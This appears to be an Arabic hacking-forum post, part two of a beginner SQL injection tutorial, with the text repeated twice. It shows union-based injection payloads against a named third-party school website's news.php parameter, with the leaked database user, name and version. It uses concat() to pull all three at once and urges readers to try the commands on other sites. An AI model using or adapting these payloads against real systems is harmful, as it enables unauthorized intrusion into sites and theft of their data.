تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
[
السلام عليكم ورحمة الله وبركاته
الشرح مقدم للأخ هيثم وباقي اعضاء المنتدى الكريم
كنت قد شرحت في درس الامس
طريقة اكتشاف ثغرة سيكول (sql injection)
====================
ووعدتكم بالانتقال الى مرحلة اخرى وهي اكتشاف العمود المصاب
وتطبيق بعض الاوامر عليه ...
====================
أما الدرس القادم والاخير غدا ان شاء الله
اعرف ان هناك شروحات مميزة للاخوة المحترفين وتفوق شرحي بكثير لكن انا اردت كسر الهوه بين المحترف والمبتدء
نبدأ على بركة الله....
لنأخذ الموقع التالي
نريد ان نعرف ماهو الجدول المصاب والذي سوف نسحب من المعلومات
في الدرس السابق عرفنا ان عدد الجداول 5
وعندها سنستخدم الامر التالي :
عدد الجداول 5 كما قلنا فيصبح الامر على الشكل التالي
اي ان الرابط يصبح على الشكل التالي
وقلنا ان اشارة -- اخر الرابط كي تستجيب القاعده لامرنا
نضع هذا الرابط في المتصفح لنرى الجدول المصاب من بين هذه الجداول ال5 ....
وضعته لكن لم يظهر اي شيء
طيب ما الحل ؟!! الحل ان اضع اشارة - بعد ال=
يعني يصبح الرابط :
انظروا ماذا ظهر لي ... ?!
انظر الصورة :
ظهر لي الاعمده
2
4
5
يعني ان الجدول 2 و4 و5 مصابات ونستطيع سحب المعلومات من اي جدول نريده من بين هذه الجداول
والان دعونا نطبق بعض الاوامر
لمعرفة اسم المستخدم لهذه القاعده نضع
الامر التالي :
مكان الجدول المصاب وليكن الجدول رقم 2
فيصبح الرابط على الشكل التالي
وظهر لنا : itis_dsa@localhost
انظر الصورة :
طيب نريد اسم القاعده فنضع الامر التالي مكان العمود المصاب
فيصبح الرابط :
فظهر لنا :itis_dsa
طيب نريد ان نرى اصدار القاعده
نستخدم الامر التالي
ليصبح الرابط على الشكل التالي
فظهر لنا الاصدار وهو :5.1.63
طيب اذا اردت الاستعلام عن الاصدار واسم المستخدم واسم القاعده استخدم هذا الامر
ماذا يعني هذا؟
هذا الامر concat لجمع عدة اوامر مع بعضها
0x3a3a
هذه العلامة سوف تفصل بين اسم القاعده واسم المستخدم والاصدار وهي مشفره بالهيكسس وتعني العلامة التاليه :
ماذا ظهر لي ؟
itis_dsa@localhost::itis_dsa::5.1.63
انظر الصورة :
اترك لكم الان التطبيق على عدد من المواقع وتطبيق هذه الاوامر للانتقال الى المرحله الاخيره
انتهى الدرس الثاني
استودعكم الله
لكم تحيات اخوكم the punisher
الشرح مقدم للأخ هيثم وباقي اعضاء المنتدى الكريم
كنت قد شرحت في درس الامس
طريقة اكتشاف ثغرة سيكول (sql injection)
====================
ووعدتكم بالانتقال الى مرحلة اخرى وهي اكتشاف العمود المصاب
وتطبيق بعض الاوامر عليه ...
====================
أما الدرس القادم والاخير غدا ان شاء الله
اعرف ان هناك شروحات مميزة للاخوة المحترفين وتفوق شرحي بكثير لكن انا اردت كسر الهوه بين المحترف والمبتدء
نبدأ على بركة الله....
لنأخذ الموقع التالي
HTML:
http://www.dsasummercamp.edu.gr/news.php?id=123
في الدرس السابق عرفنا ان عدد الجداول 5
وعندها سنستخدم الامر التالي :
كود:
union+select
كود:
union+select+1,2,3,4,5--
كود:
http://www.dsasummercamp.edu.gr/news.php?id=123+union+select+1,2,3,4,5--
نضع هذا الرابط في المتصفح لنرى الجدول المصاب من بين هذه الجداول ال5 ....
وضعته لكن لم يظهر اي شيء
طيب ما الحل ؟!! الحل ان اضع اشارة - بعد ال=
يعني يصبح الرابط :
كود:
http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,2,3,4,5--
انظر الصورة :
ظهر لي الاعمده
2
4
5
يعني ان الجدول 2 و4 و5 مصابات ونستطيع سحب المعلومات من اي جدول نريده من بين هذه الجداول
والان دعونا نطبق بعض الاوامر
لمعرفة اسم المستخدم لهذه القاعده نضع
الامر التالي :
كود:
user()
فيصبح الرابط على الشكل التالي
كود:
http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,user%28%29,3,4,5--
انظر الصورة :
طيب نريد اسم القاعده فنضع الامر التالي مكان العمود المصاب
كود:
database()
كود:
http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,database%28%29,3,4,5--
طيب نريد ان نرى اصدار القاعده
نستخدم الامر التالي
كود:
version()
كود:
http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,version%28%29,3,4,5--
طيب اذا اردت الاستعلام عن الاصدار واسم المستخدم واسم القاعده استخدم هذا الامر
كود:
concat(user(),0x3a3a,database(),0x3a3a,version())
هذا الامر concat لجمع عدة اوامر مع بعضها
0x3a3a
هذه العلامة سوف تفصل بين اسم القاعده واسم المستخدم والاصدار وهي مشفره بالهيكسس وتعني العلامة التاليه :
كود:
::
ماذا ظهر لي ؟
itis_dsa@localhost::itis_dsa::5.1.63
انظر الصورة :
اترك لكم الان التطبيق على عدد من المواقع وتطبيق هذه الاوامر للانتقال الى المرحله الاخيره
انتهى الدرس الثاني
استودعكم الله
لكم تحيات اخوكم the punisher
اسم الموضوع : تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
|
المصدر : SQL قواعد البيانات